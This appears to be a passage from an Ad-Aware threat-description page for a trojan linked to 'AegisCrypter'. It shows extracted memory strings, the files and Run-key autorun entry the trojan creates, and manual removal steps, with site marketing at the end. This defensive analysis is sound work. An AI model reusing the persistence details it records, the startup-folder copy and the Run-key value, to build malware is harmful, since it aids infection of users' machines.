Alt  Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
No help found for %s
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Thread creation error: %s
Thread Error: %s (%d)7CreateClone not implemented for class %s with source %s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Ancestor for '%s' not found
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

AegisCrypter.exe_3500_rwx_016B8000_00089000:

.idat
Str.gg
%S!o$
kern0l32.ud
:.fk>Hd3*
<t%saI
^L.CZ
:H.Cb
S.rArRK) 
.Ww!7
}V,W%U
Keyw
%ss[4d]
wvoM/%cG
a<&||Q/.WJ
{:%cT
uT%f/
\-84%ss_Jd
n"%F!
.jvjUy
0123456
.AMinu
rkeyyR
(),-./:?
%&*;<=>@
[]^_`{|}
f=~%uc
4.Sr[
>/`
h.JxI
%u<x!P&
4b.fWj)
&0 %F<U
pIDuw%c
B|%s'-
-=.tQ
:!0_ 41 )
j-~.RDr#~
"%s1,4)
o%FQ3
WtCp
1234567
%xieD)%m${
>,939498'9
%cr}2
r:%u.
,u%X'
%cjTSR
fV5i%f
df` %f
("9%s
p-rT}
U.YLL
"ÓA
\..ESc
$%&'()* 
,-./012;
RG.Mt?.
.EVH2Z
%D<EF
%drj8ID\X
%^.Ghq
T".Dg
H7LiY.%U
Mk!.sum(f
.UBaN
p:L. H.pL 
%xtN3
' '$'(',%0
:.gb$i2
;r.Jm
t.tMJ6%\d
\J.nF
F<r.rFI^>$
"T'^%d
D9Y-pw%d
|P8h%x_
MTL%dl
N%dSH-
.UoeE-
y9FR%c
zj 5%d
d{.tA%
12345678
9#9'9 9/93.7|
q:\1A
L:\QR
%dv`\(
Site : hXXp://VVV.enigmaprotector.com/
E-mail : support@enigmaprotector.com
Lisence holder: %sW

Chrome.exe_1472_rwx_003FC000_00004000:

%X?j^
%F?j^
%D?j^


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    YEFDGYT.EXE:264
    %original file name%.exe:3404
    aegis.exe:3360
    WScript.exe:3520

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.exe (7386 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\AegisCrypter.exe (76392 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\aegis.exe (25213 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.vbs (41546 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ~~{Mutex}~~.exe (7385 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\YEFDGYT.EXE (249034 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\M9IJLAFN.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\F150F31D (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XKSK093Z.txt (118 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\FreeStub20170327[1].Bin (11250 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Stub\FreeStub20170327.Bin (14090 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    " ~~{Mutex}~~" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Chrome.exe .."

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now